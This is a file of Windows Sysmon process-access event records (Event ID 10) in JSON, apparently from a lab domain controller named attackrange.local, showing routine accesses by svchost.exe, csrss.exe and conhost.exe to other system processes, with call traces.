{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010162F0B00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010162F0B00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010362F0B00}\r\nTargetProcessId: 4684\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010362F0B00}","TargetProcessId":"4684","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.820\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010162F0B00}\r\nSourceProcessId: 2996\r\nSourceThreadId: 3764\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nTargetProcessId: 4688\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.820","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010162F0B00}","SourceProcessId":"2996","SourceThreadId":"3764","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","TargetProcessId":"4688","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
